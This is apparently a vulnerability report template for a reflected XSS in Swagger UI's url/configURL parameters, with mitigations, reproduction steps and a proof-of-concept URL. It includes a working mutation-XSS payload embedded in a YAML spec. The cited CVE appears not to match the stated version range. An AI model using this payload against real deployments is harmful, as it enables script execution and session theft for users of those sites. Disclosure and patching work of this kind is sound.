Swagger Reflected XSS Vulnerability in “URL/configURL” Parameter on “Endpoint”

Overview

• Vulnerability Type: Reflected #Cross-Site Scripting (XSS)
• Affected Component: Swagger UI
• Location: https://the-red.team/templates/swagger-xss
• Parameter: URL/configURL
• Severity: Medium (6.1)
• CVE ID: CVE-2016-1000229
• CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Description

An XSS vulnerability has been identified in the Swagger UI component, specifically in its handling of YAML configuration files imported via the url and configURL parameters. This vulnerability arises due to inadequate input validation and sanitization of user-supplied data in the Swagger UI interface, allowing an attacker to inject and execute arbitrary JavaScript code within the context of a user’s browser.

Impact

If successfully exploited, this vulnerability could lead to various attacks, including but not limited to:

• Session hijacking
• Data theft
• Malicious code execution
• Defacement of the application

Affected Versions:

• The vulnerability has been confirmed in the following versions: Swagger UI 3.14.0 < 3.38.0

Other versions might also be affected, and it is recommended to assess all versions of the Swagger UI component.

Recommendation:

To mitigate the risk associated with this vulnerability, the following actions are recommended:

1. Update: Apply the latest patches or updates provided by the vendor to address this vulnerability. (See https://swagger.io/tools/swagger-ui/)
2. Input Sanitization: Implement strict input validation and sanitization mechanisms to prevent malicious inputs from being processed. 3 .Content Security Policy (CSP): Enforce a robust CSP to restrict the execution of unauthorized scripts.
3. Security Headers: Configure appropriate security headers (e.g., X-XSS-Protection) to enhance browser security.
4. Regular Security Audits: Conduct regular security audits and penetration testing to identify and remediate vulnerabilities proactively.

Steps to Reproduce:

The following steps demonstrate how an attacker could exploit this vulnerability:

1. Access the Swagger UI interface located at vulnerable-url.com/swagger
2. Access the payload using https://the-red.team/poc/swagger-xss.yaml or host the file below, making sure to set the proper headers so the endpoint can access it.

swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts

3. Import a YAML configuration file using the “url” or “configURL” parameter.
4. Inject and submit a malicious JavaScript payload within the YAML file.
5. Observe if the payload gets executed within the context of the application.

Proof of Concept (PoC):

Visit the following url to see that the script is executed: https://test.test/swagger?url=https://the-red.team/poc/swagger-xss.yaml

Additional Information:

Vendor Advisory: [Link to vendor advisory, if available] CVE Details: [Link to CVE details, if applicable]

Contact: [Your contact information] Date Reported: [Date of reporting] PoC YAML file:

References

• https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
• https://the-red.team/poc/swagger-xss.yaml
• https://the-red.team/templates/swagger-xss